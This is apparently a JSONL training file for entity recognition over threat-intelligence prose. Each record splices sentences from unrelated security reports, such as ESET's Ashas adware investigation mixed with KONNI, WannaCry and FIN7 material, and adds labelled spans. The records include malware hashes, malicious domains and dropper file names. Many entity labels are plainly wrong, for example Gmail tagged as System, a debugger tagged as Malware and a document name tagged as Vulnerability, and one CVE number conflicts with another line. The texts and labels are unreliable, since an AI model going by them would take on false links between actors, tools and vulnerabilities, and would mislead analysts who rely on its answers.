{"text": "Figure 1 . OceanLotus was another actor active during this period , using a new downloader called KerrDown , as reported by Palo Alto . A new URI is available: <c2-domain>/uploadtm.php .", "spans": [{"start": 11, "end": 21, "label": "Organization"}, {"start": 98, "end": 106, "label": "System"}, {"start": 124, "end": 133, "label": "Organization"}, {"start": 160, "end": 184, "label": "Indicator"}]}
{"text": "Apps of the Android/AdDisplay.Ashas family reported to Google by ESET Figure 2 . ESET recently uncovered a new addition to OceanLotus\u2019s toolset targeting Mac OS . This URI is used with a new feature implemented in this version: the malware is able to perform screenshot (thanks to the GDI API) and uploads it thank to this URL .", "spans": [{"start": 12, "end": 35, "label": "Malware"}, {"start": 65, "end": 69, "label": "Organization"}, {"start": 81, "end": 85, "label": "Organization"}, {"start": 123, "end": 135, "label": "Organization"}]}
{"text": "The most popular member of the Android/AdDisplay.Ashas family on Google Play was \u201c Video downloader master \u201d with over five million downloads Ashas functionality All the apps provide the functionality they promise , besides working as adware . In mid-2018 , Kaspersky's report on Operation AppleJeus\u201d highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges . The malware checks if a file used on a previous version of KONNI is available on the system .", "spans": [{"start": 31, "end": 61, "label": "Malware"}, {"start": 65, "end": 76, "label": "System"}, {"start": 142, "end": 147, "label": "Malware"}, {"start": 258, "end": 269, "label": "Organization"}, {"start": 330, "end": 337, "label": "Organization"}, {"start": 440, "end": 445, "label": "Malware"}]}
{"text": "The adware functionality is the same in all the apps we analyzed . Kaspersky also observed some activity from Gaza Team and MuddyWater . Here is the complete list of files internally used by the RAT: error.tmp (the log file of the keylogger) tedsul.ocx helpsol.ocx trepsl.ocx psltred.ocx solhelp.ocx sulted.ocx .", "spans": [{"start": 67, "end": 76, "label": "Organization"}, {"start": 124, "end": 134, "label": "Organization"}, {"start": 200, "end": 209, "label": "Indicator"}, {"start": 242, "end": 252, "label": "Indicator"}, {"start": 253, "end": 264, "label": "Indicator"}, {"start": 265, "end": 275, "label": "Indicator"}, {"start": 276, "end": 287, "label": "Indicator"}, {"start": 288, "end": 299, "label": "Indicator"}, {"start": 300, "end": 310, "label": "Indicator"}]}
{"text": "[ Note : The analysis of the functionality below describes a single app , but applies to all apps of the Android/AdDisplay.Ashas family . Kaspersky wrote about LuckyMouse targeting national data centers in June . The handling of instructions has improved too .", "spans": [{"start": 105, "end": 135, "label": "Malware"}, {"start": 138, "end": 147, "label": "Organization"}, {"start": 160, "end": 170, "label": "Organization"}]}
{"text": "] Once launched , the app starts to communicate with its C & C server ( whose IP address is base64-encoded in the app ) . Kaspersky also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China . Here are the 7 actions that the infected machine can be instructed to perform: Delete a specific file .", "spans": [{"start": 122, "end": 131, "label": "Organization"}, {"start": 153, "end": 163, "label": "Organization"}]}
{"text": "It sends \u201c home \u201d key data about the affected device : device type , OS version , language , number of installed apps , free storage space , battery status , whether the device is rooted and Developer mode enabled , and whether Facebook and FB Messenger are installed . Kaspersky have observed similar activity in the past from groups such as Oilrig and Stonedrill , which leads us to believe the new attacks could be connected , though for now that connection is only assessed as low confidence . Upload a specific file based on a filename .", "spans": [{"start": 228, "end": 236, "label": "Organization"}, {"start": 244, "end": 253, "label": "System"}, {"start": 270, "end": 279, "label": "Organization"}, {"start": 343, "end": 349, "label": "Organization"}, {"start": 354, "end": 364, "label": "Organization"}]}
{"text": "Figure 3 . In August 2019 , FireEye released the Double Dragon\u201d report on our newest graduated threat group , APT41 . Upload a specific file based on the full path name .", "spans": [{"start": 28, "end": 35, "label": "Organization"}, {"start": 110, "end": 115, "label": "Organization"}]}
{"text": "Sending information about the affected device The app receives configuration data from the C & C server , needed for displaying ads , and for stealth and resilience . Today , FireEye Intelligence is releasing a comprehensive report detailing APT41 , a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations . Create a screenshot and uploads it on the C2 .", "spans": [{"start": 175, "end": 182, "label": "Organization"}, {"start": 242, "end": 247, "label": "Organization"}, {"start": 357, "end": 368, "label": "Organization"}, {"start": 434, "end": 436, "label": "System"}]}
{"text": "Figure 4 . Group-IB experts continuously monitor the Silence\u2019 activities . Get system information .", "spans": [{"start": 11, "end": 19, "label": "Organization"}, {"start": 53, "end": 61, "label": "Organization"}]}
{"text": "Configuration file received from the C & C server As for stealth and resilience , the attacker uses a number of tricks . Group-IB has uncovered a hacker group , MoneyTaker , attacking banks in the USA and Russia . Download a file from the Internet .", "spans": [{"start": 121, "end": 129, "label": "Organization"}, {"start": 161, "end": 171, "label": "Organization"}, {"start": 184, "end": 189, "label": "Organization"}]}
{"text": "First , the malicious app tries to determine whether it is being tested by the Google Play security mechanism . Group-IB reveals the unknown details of attacks from one of the most notorious APT groups , Lazarus . Execute a command .", "spans": [{"start": 79, "end": 90, "label": "System"}, {"start": 112, "end": 120, "label": "Organization"}, {"start": 204, "end": 211, "label": "Organization"}]}
{"text": "For this purpose , the app receives from the C & C server the isGoogleIp flag , which indicates whether the IP address of the affected device falls within the range of known IP addresses for Google servers . Finally , Kaspersky produced a summary report on Sofacy\u2019s summertime activity . When the attacker wants to gather information on the infected system (action 5) , it retrieves the following information: Hostname IP address Computer name Username name Connected drive OS version Architecture Start menu programs Installed software .", "spans": [{"start": 218, "end": 227, "label": "Organization"}, {"start": 257, "end": 265, "label": "Organization"}]}
{"text": "If the server returns this flag as positive , the app will not trigger the adware payload . Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff . The last identified campaign where KONNI was used was named Inter Agency List and Phonebook - April 2017 RC_Office_Coordination_Associate.scr .", "spans": [{"start": 92, "end": 101, "label": "Organization"}, {"start": 191, "end": 200, "label": "Organization"}, {"start": 205, "end": 215, "label": "Organization"}, {"start": 253, "end": 258, "label": "Malware"}, {"start": 323, "end": 359, "label": "Indicator"}]}
{"text": "Second , the app can set a custom delay between displaying ads . Analysis of the payload allowed us to confidently link this attack to an actor Kaspersky track as BlackOasis . This file drops exactly the same files than the previous campaign but the decoy document is different .", "spans": [{"start": 144, "end": 153, "label": "Organization"}, {"start": 163, "end": 173, "label": "Organization"}]}
{"text": "The samples we have seen had their configuration set to delay displaying the first ad by 24 minutes after the device unlocks . Kaspersky first became aware of BlackOasis\u2019 activities in May 2016 , while investigating another Adobe Flash zero day . This document contains the name , phone number and email address of members of agencies , embassies and organizations linked to North Korea .", "spans": [{"start": 127, "end": 136, "label": "Organization"}, {"start": 159, "end": 170, "label": "Organization"}, {"start": 236, "end": 244, "label": "Vulnerability"}, {"start": 298, "end": 303, "label": "System"}]}
{"text": "This delay means that a typical testing procedure , which takes less than 10 minutes , will not detect any unwanted behavior . It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) . The analysis shows us the evolution of KONNI over the last 3 years .", "spans": [{"start": 141, "end": 154, "label": "Malware"}, {"start": 181, "end": 217, "label": "Malware"}, {"start": 249, "end": 259, "label": "Malware"}, {"start": 272, "end": 284, "label": "Malware"}, {"start": 328, "end": 333, "label": "Malware"}]}
{"text": "Also , the longer the delay , the lower the risk of the user associating the unwanted ads with a particular app . We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . The last campaign was started a few days ago and is still active .", "spans": [{"start": 128, "end": 139, "label": "Malware"}]}
{"text": "Third , based on the server response , the app can also hide its icon and create a shortcut instead . Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook . The infrastructure remains up and running at the time of this post .", "spans": [{"start": 123, "end": 138, "label": "Malware"}, {"start": 221, "end": 240, "label": "Organization"}, {"start": 269, "end": 277, "label": "Organization"}]}
{"text": "If a typical user tries to get rid of the malicious app , chances are that only the shortcut ends up getting removed . However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team . The RAT has remained under the Radar for multiple years .", "spans": [{"start": 158, "end": 171, "label": "Malware"}, {"start": 236, "end": 249, "label": "Organization"}, {"start": 283, "end": 288, "label": "System"}]}
{"text": "The app then continues to run in the background without the user \u2019 s knowledge . The initial indicator of the attack was a malicious web shell that was detected on an IIS server , coming out of the w3wp.exe process . An explanation could be the fact that the campaign was very limited nature , which does not arouse suspicion .", "spans": [{"start": 198, "end": 206, "label": "Malware"}]}
{"text": "This stealth technique has been gaining popularity among adware-related threats distributed via Google Play . We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . This investigation shows that the author has evolved technically (by implementing new features) and in the quality of the decoy documents .", "spans": [{"start": 96, "end": 107, "label": "System"}, {"start": 138, "end": 144, "label": "Organization"}, {"start": 193, "end": 203, "label": "Organization"}, {"start": 217, "end": 225, "label": "Organization"}]}
{"text": "Figure 5 . Instead , sensitive KHNP documents were leaked by the actors as part of an effort to exaggerate the access they had and embarrass the South Korean Government , a technique we assess North Korea would turn to again in order to instill fear and/or meet domestic propaganda aims . The campaign of April 2017 used pertinent documents containing potentially sensitive data .", "spans": [{"start": 31, "end": 45, "label": "Malware"}, {"start": 65, "end": 71, "label": "Organization"}, {"start": 145, "end": 168, "label": "Organization"}]}
{"text": "Time delay to postpone displaying ads implemented by the adware Once the malicious app receives its configuration data , the affected device is ready to display ads as per the attacker \u2019 s choice ; each ad is displayed as a full screen activity . North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . Moreover the metadata of the Office document contains the names of people who seems to work for a public organization .", "spans": [{"start": 384, "end": 393, "label": "Organization"}, {"start": 405, "end": 412, "label": "Organization"}, {"start": 454, "end": 460, "label": "System"}]}
{"text": "If the user wants to check which app is responsible for the ad being displayed , by hitting the \u201c Recent apps \u201d button , another trick is used : the app displays a Facebook or Google icon , as seen in Figure 6 . The malware may inject itself into browser processes and explorer.exe . We don't know if the document is a legitimate compromised document or a fake that the attacker has created in an effort to be credible .", "spans": [{"start": 164, "end": 172, "label": "Organization"}, {"start": 176, "end": 182, "label": "Organization"}, {"start": 216, "end": 223, "label": "System"}, {"start": 269, "end": 281, "label": "Malware"}]}
{"text": "The adware mimics these two apps to look legitimate and avoid suspicion \u2013 and thus stay on the affected device for as long as possible . In the last few weeks , FormBook was seen downloading other malware families such as NanoCore . Clearly the author has a real interest in North Korea , with 3 of the 4 campaigns are linked to North Korea .", "spans": [{"start": 161, "end": 169, "label": "Malware"}, {"start": 222, "end": 230, "label": "Malware"}]}
{"text": "Figure 6 . The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents . Additional ways our customers can detect and block this threat are listed below .", "spans": [{"start": 87, "end": 94, "label": "Organization"}, {"start": 133, "end": 152, "label": "Malware"}]}
{"text": "The adware activity impersonates Facebook ( left ) . Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . Advanced Malware Protection ( AMP ) is ideally suited to prevent the execution of the malware used by these threat actors .", "spans": [{"start": 33, "end": 41, "label": "Organization"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 153, "end": 168, "label": "Malware"}, {"start": 180, "end": 207, "label": "System"}, {"start": 210, "end": 213, "label": "System"}]}
{"text": "If the user long-presses the icon , the name of the app responsible for the activity is revealed ( right ) . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks .", "spans": [{"start": 153, "end": 168, "label": "Malware"}, {"start": 233, "end": 246, "label": "Vulnerability"}, {"start": 249, "end": 252, "label": "System"}, {"start": 256, "end": 259, "label": "System"}]}
{"text": "Finally , the Ashas adware family has its code hidden under the com.google.xxx package name . In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros . Email Security can block malicious emails sent by threat actors as part of their campaign .", "spans": [{"start": 14, "end": 19, "label": "Malware"}, {"start": 122, "end": 127, "label": "Organization"}, {"start": 142, "end": 158, "label": "Malware"}, {"start": 242, "end": 256, "label": "System"}, {"start": 277, "end": 283, "label": "System"}]}
{"text": "This trick \u2013 posing as a part of a legitimate Google service \u2013 may help avoid scrutiny . APT32 actors continue to deliver the malicious attachments via spear-phishing emails . The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors .", "spans": [{"start": 46, "end": 52, "label": "Organization"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 126, "end": 147, "label": "Malware"}, {"start": 180, "end": 196, "label": "Organization"}, {"start": 211, "end": 214, "label": "System"}, {"start": 219, "end": 223, "label": "System"}]}
{"text": "Some detection mechanisms and sandboxes may whitelist such package names , in an effort to prevent wasting resources . APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel files to deliver their initial exploits . AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products .", "spans": [{"start": 119, "end": 124, "label": "Organization"}, {"start": 176, "end": 197, "label": "Malware"}, {"start": 234, "end": 249, "label": "Organization"}, {"start": 314, "end": 328, "label": "Organization"}]}
{"text": "Figure 7 . Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . Umbrella , our secure internet gateway (SIG) , blocks users from connecting to malicious domains , IPs , and URLs , whether users are on or off the corporate network .", "spans": [{"start": 91, "end": 99, "label": "Malware"}, {"start": 150, "end": 158, "label": "Organization"}]}
{"text": "Malicious code hidden in a package named \u201c com.google \u201d Hunting down the developer Using open-source information , we tracked down the developer of the adware , who we also identified as the campaign \u2019 s operator and owner of the C & C server . February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker , a macOS version of APT28\u2019s Xagent malware , and a new Trojan ransomware . SHA256 : 413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f .", "spans": [{"start": 426, "end": 434, "label": "Organization"}, {"start": 456, "end": 463, "label": "Organization"}, {"start": 491, "end": 508, "label": "Malware"}, {"start": 520, "end": 584, "label": "Indicator"}]}
{"text": "In the following paragraphs , we outline our efforts to discover other applications from the same developer and protect our users from it . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . Filename: beauty.scr .", "spans": [{"start": 169, "end": 188, "label": "Malware"}, {"start": 200, "end": 213, "label": "Vulnerability"}, {"start": 239, "end": 256, "label": "System"}, {"start": 269, "end": 279, "label": "Indicator"}]}
{"text": "First , based on information that is associated with the registered C & C domain , we identified the name of the registrant , along with further data like country and email address , as seen in Figure 8 . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . SHA256 : eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435 .", "spans": [{"start": 217, "end": 234, "label": "Malware"}, {"start": 285, "end": 298, "label": "Vulnerability"}, {"start": 404, "end": 411, "label": "Malware"}, {"start": 423, "end": 487, "label": "Indicator"}]}
{"text": "Figure 8 . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . Filename: C:\\Windows\\beauty.jpg .", "spans": [{"start": 45, "end": 53, "label": "Malware"}, {"start": 60, "end": 97, "label": "Vulnerability"}, {"start": 110, "end": 131, "label": "Indicator"}]}
{"text": "Information about the C & C domain used by the Ashas adware Knowing that the information provided to a domain registrar might be fake , we continued our search . To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe utility to register a custom shim database file containing a patch onto a system . File type: JPEG image data , JFIF standard 1.02 .", "spans": [{"start": 47, "end": 52, "label": "Malware"}, {"start": 228, "end": 232, "label": "Organization"}, {"start": 262, "end": 279, "label": "System"}, {"start": 296, "end": 307, "label": "Malware"}]}
{"text": "The email address and country information drove us to a list of students attending a class at a Vietnamese university \u2013 corroborating the existence of the person under whose name the domain was registered . During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe with their CARBANAK payload . SHA256 : 44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9 .", "spans": [{"start": 235, "end": 243, "label": "Organization"}, {"start": 258, "end": 262, "label": "Organization"}, {"start": 339, "end": 351, "label": "Malware"}, {"start": 363, "end": 371, "label": "System"}, {"start": 391, "end": 455, "label": "Indicator"}]}
{"text": "Figure 9 . We have not yet identified FIN7\u2019s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft . Hilename: C:\\Windows\\svchost.exe .", "spans": [{"start": 38, "end": 44, "label": "Organization"}, {"start": 124, "end": 140, "label": "Malware"}, {"start": 281, "end": 303, "label": "Indicator"}]}
{"text": "A university class student list including the C & C domain registrant Due to poor privacy practices on the part of our culprit \u2019 s university , we now know his date of birth ( probably : he seemingly used his birth year as part of his Gmail address , as further partial confirmation ) , we know that he was a student and what university he attended . Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign . File type: PE32 executable (GUI) Intel 80386 , for MS Windows .", "spans": [{"start": 235, "end": 240, "label": "System"}, {"start": 375, "end": 389, "label": "Malware"}, {"start": 493, "end": 503, "label": "Organization"}]}
{"text": "We were also able to confirm that the phone number he provided to the domain registrar was genuine . Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms . phpschboy.prohosts.org .", "spans": [{"start": 126, "end": 138, "label": "Malware"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 220, "end": 229, "label": "Organization"}, {"start": 232, "end": 254, "label": "Indicator"}]}
{"text": "Moreover , we retrieved his University ID ; a quick googling showed some of his exam grades . The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 . jams481.site.bz .", "spans": [{"start": 98, "end": 105, "label": "Malware"}, {"start": 262, "end": 281, "label": "System"}, {"start": 294, "end": 302, "label": "Organization"}, {"start": 326, "end": 341, "label": "Indicator"}]}
{"text": "However , his study results are out of the scope of our research . The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD (via Bitcoin) to decrypt the data . SHA256 : 94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5 .", "spans": [{"start": 71, "end": 78, "label": "Malware"}, {"start": 117, "end": 132, "label": "Malware"}, {"start": 247, "end": 311, "label": "Indicator"}]}
{"text": "Based on our culprit \u2019 s email address , we were able to find his GitHub repository . The malware then builds two DLLs in memory \u2013 they are 32 and 64-bit DLLs that have identical functionality . Filename: How can North Korean hydrogen bomb wipe out Manhattan.scr .", "spans": [{"start": 66, "end": 72, "label": "Organization"}, {"start": 90, "end": 97, "label": "Malware"}, {"start": 114, "end": 118, "label": "Malware"}, {"start": 205, "end": 262, "label": "Indicator"}]}
{"text": "His repository proves that he is indeed an Android developer , but it contained no publicly available code of the Ashas adware at the time of writing of this blogpost . The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security . SHA256 : 56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634 .", "spans": [{"start": 43, "end": 50, "label": "System"}, {"start": 114, "end": 119, "label": "Malware"}, {"start": 173, "end": 180, "label": "Malware"}, {"start": 219, "end": 230, "label": "Malware"}, {"start": 323, "end": 387, "label": "Indicator"}]}
{"text": "However , a simple Google search for the adware package name returned a \u201c TestDelete \u201d project that had been available in his repository at some point The malicious developer also has apps in Apple \u2019 s App Store . The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe . Filename: conhote.dll .", "spans": [{"start": 19, "end": 25, "label": "Organization"}, {"start": 192, "end": 197, "label": "Organization"}, {"start": 202, "end": 211, "label": "System"}, {"start": 218, "end": 225, "label": "Malware"}, {"start": 265, "end": 269, "label": "Malware"}, {"start": 270, "end": 293, "label": "Malware"}, {"start": 306, "end": 317, "label": "Indicator"}]}
{"text": "Some of them are iOS versions of the ones removed from Google Play , but none contain adware functionality . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . SHA256 : 553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc .", "spans": [{"start": 17, "end": 20, "label": "System"}, {"start": 55, "end": 66, "label": "System"}, {"start": 127, "end": 136, "label": "Malware"}, {"start": 166, "end": 179, "label": "Malware"}, {"start": 204, "end": 268, "label": "Indicator"}]}
{"text": "Figure 10 . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Filename: winnit.exe .", "spans": [{"start": 30, "end": 39, "label": "Malware"}, {"start": 69, "end": 82, "label": "Malware"}, {"start": 108, "end": 118, "label": "Indicator"}]}
{"text": "The malicious developer \u2019 s apps published on the App Store which don \u2019 t contain the Ashas adware Searching further for the malicious developer \u2019 s activities , we also discovered his Youtube channel propagating the Ashas adware and his other projects . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . SHA256 : 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f .", "spans": [{"start": 86, "end": 91, "label": "Malware"}, {"start": 185, "end": 192, "label": "System"}, {"start": 217, "end": 222, "label": "Malware"}, {"start": 273, "end": 282, "label": "Malware"}, {"start": 312, "end": 325, "label": "Malware"}, {"start": 350, "end": 414, "label": "Indicator"}]}
{"text": "As for the Ashas family , one of the associated promotional videos , \u201c Head Soccer World Champion 2018 \u2013 Android , ios \u201d was viewed almost three million times and two others reached hundreds of thousands of views , as seen in Figure 11 . Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb . Filename: Anti virus service.lnk . dowhelsitjs.netau.net .", "spans": [{"start": 11, "end": 16, "label": "Malware"}, {"start": 105, "end": 112, "label": "System"}, {"start": 115, "end": 118, "label": "System"}, {"start": 253, "end": 260, "label": "Malware"}, {"start": 265, "end": 271, "label": "Malware"}, {"start": 400, "end": 422, "label": "Indicator"}, {"start": 425, "end": 446, "label": "Indicator"}]}
{"text": "Figure 11 . We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . SHA256 : 69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0 .", "spans": [{"start": 34, "end": 38, "label": "Malware"}, {"start": 39, "end": 77, "label": "Malware"}, {"start": 184, "end": 248, "label": "Indicator"}]}
{"text": "YouTube channel of the malicious developer His YouTube channel provided us with another valuable piece of information : he himself features in a video tutorial for one of his other projects . Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control (C2) server . Filename: Pyongyang Directory Group email April 2017.RC_Office_Coordination_Associate.scr .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 47, "end": 54, "label": "System"}, {"start": 281, "end": 289, "label": "Malware"}, {"start": 294, "end": 301, "label": "Malware"}, {"start": 329, "end": 339, "label": "Malware"}, {"start": 344, "end": 351, "label": "Malware"}, {"start": 401, "end": 480, "label": "Indicator"}]}
{"text": "Thanks to that project , we were able to extract his Facebook profile \u2013 which lists his studies at the aforementioned university . The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that \u2013 when enabled \u2013 leads to the download of Hancitor . SHA256 : 4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b .", "spans": [{"start": 53, "end": 61, "label": "Organization"}, {"start": 280, "end": 288, "label": "Malware"}, {"start": 300, "end": 364, "label": "Indicator"}]}
{"text": "Figure 12 . After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . Filename: adobe distillist.lnk .", "spans": [{"start": 60, "end": 64, "label": "Malware"}, {"start": 69, "end": 76, "label": "Malware"}, {"start": 120, "end": 140, "label": "Indicator"}]}
{"text": "Facebook profile of the C & C domain registrar ( cover picture and profile picture edited out ) Linked on the malicious developer \u2019 s Facebook profile , we discovered a Facebook page , Minigameshouse , and an associated domain , minigameshouse [ . Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll\u201d along with a standard Vawtrak trojan . SHA256 : 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 134, "end": 142, "label": "Organization"}, {"start": 169, "end": 177, "label": "Organization"}, {"start": 185, "end": 199, "label": "Indicator"}, {"start": 229, "end": 247, "label": "Indicator"}, {"start": 324, "end": 332, "label": "Malware"}, {"start": 350, "end": 362, "label": "Malware"}, {"start": 365, "end": 372, "label": "Malware"}, {"start": 421, "end": 485, "label": "Indicator"}]}
{"text": "] net . In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER (due to the project name ATMRIPPER\u201d identified in the sample) and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand . Filename: winload.exe .", "spans": [{"start": 23, "end": 30, "label": "Organization"}, {"start": 54, "end": 65, "label": "Malware"}, {"start": 86, "end": 92, "label": "Malware"}, {"start": 266, "end": 271, "label": "Organization"}, {"start": 296, "end": 307, "label": "Indicator"}]}
{"text": "This domain is similar to the one the malware author used for his adware C & C communication , minigameshouse [ . RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . SHA256 : dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d .", "spans": [{"start": 95, "end": 113, "label": "Indicator"}, {"start": 114, "end": 120, "label": "Malware"}, {"start": 121, "end": 143, "label": "Malware"}, {"start": 263, "end": 327, "label": "Indicator"}]}
{"text": "] us . RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . Filename: winload.dll .", "spans": [{"start": 7, "end": 13, "label": "Malware"}, {"start": 19, "end": 26, "label": "Malware"}, {"start": 84, "end": 95, "label": "Organization"}, {"start": 105, "end": 135, "label": "Malware"}, {"start": 160, "end": 171, "label": "Indicator"}]}
{"text": "Checking this Minigameshouse page further indicates that this person is indeed the owner of the minigameshouse [ . This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . Pactchfilepacks.net23.net . checkmail.phpnet.us .", "spans": [{"start": 14, "end": 28, "label": "Indicator"}, {"start": 96, "end": 114, "label": "Indicator"}, {"start": 120, "end": 127, "label": "Malware"}, {"start": 150, "end": 186, "label": "Malware"}, {"start": 191, "end": 220, "label": "Malware"}, {"start": 250, "end": 275, "label": "Indicator"}, {"start": 278, "end": 297, "label": "Indicator"}]}
{"text": "] us domain : the phone number registered with this domain is the same as the phone number appearing on the Facebook page . From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . Lazarus used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets .", "spans": [{"start": 108, "end": 116, "label": "Organization"}, {"start": 167, "end": 172, "label": "Malware"}, {"start": 198, "end": 207, "label": "Malware"}, {"start": 281, "end": 288, "label": "Organization"}]}
{"text": "Figure 13 . Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before . Malefactors used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets .", "spans": [{"start": 67, "end": 74, "label": "Malware"}, {"start": 96, "end": 106, "label": "Malware"}, {"start": 168, "end": 183, "label": "Malware"}, {"start": 232, "end": 243, "label": "Organization"}]}
{"text": "Facebook page managed by the C & C domain registrant uses the same base domain name ( minigameshouse ) and phone number as the registered malicious C & C used by the Ashas adware Of interest is that on the Minigameshouse Facebook page , the malicious developer promotes a slew of games beyond the Ashas family for download on both Google Play and the App Store . FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL\u2019s Kalignite multivendor ATM platform . Feedback from our Smart Protection Network revealed that apart from attacks in North America ( mainly the U.S. ) , Europe , and South America , the campaign also noticeably affected enterprises in Taiwan , Hong Kong , China , and Bahrain .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 166, "end": 171, "label": "Malware"}, {"start": 221, "end": 229, "label": "Organization"}, {"start": 297, "end": 302, "label": "Malware"}, {"start": 331, "end": 342, "label": "System"}, {"start": 351, "end": 360, "label": "System"}, {"start": 363, "end": 370, "label": "Organization"}, {"start": 431, "end": 438, "label": "Malware"}, {"start": 448, "end": 457, "label": "Malware"}, {"start": 465, "end": 474, "label": "Malware"}, {"start": 541, "end": 565, "label": "Organization"}, {"start": 705, "end": 716, "label": "Organization"}]}
{"text": "However , all of those have been removed from Google Play \u2013 despite the fact that some of them didn \u2019 t contain any adware functionality . The samples we identified target the ATM vendor Diebold . On February 28 , the McAfee discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations .", "spans": [{"start": 46, "end": 57, "label": "System"}, {"start": 143, "end": 150, "label": "Malware"}, {"start": 176, "end": 194, "label": "Organization"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 262, "end": 274, "label": "Organization"}, {"start": 295, "end": 309, "label": "Organization"}, {"start": 314, "end": 337, "label": "Organization"}]}
{"text": "On top of all this , one of the malicious developer \u2019 s YouTube videos \u2013 a tutorial on developing an \u201c Instant Game \u201d for Facebook \u2013 serves as an example of operational security completely ignored . This blog covers the changes , improvements , and Indicators of Compromise (IOC) of Ploutus-D in order to help financial organizations identify and defend against this threat . On February 28 , the McAfee Advanced Threat Research team discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations .", "spans": [{"start": 56, "end": 63, "label": "System"}, {"start": 122, "end": 130, "label": "Organization"}, {"start": 283, "end": 292, "label": "Malware"}, {"start": 310, "end": 319, "label": "Organization"}, {"start": 397, "end": 428, "label": "Organization"}, {"start": 471, "end": 483, "label": "Organization"}, {"start": 504, "end": 518, "label": "Organization"}, {"start": 523, "end": 546, "label": "Organization"}]}
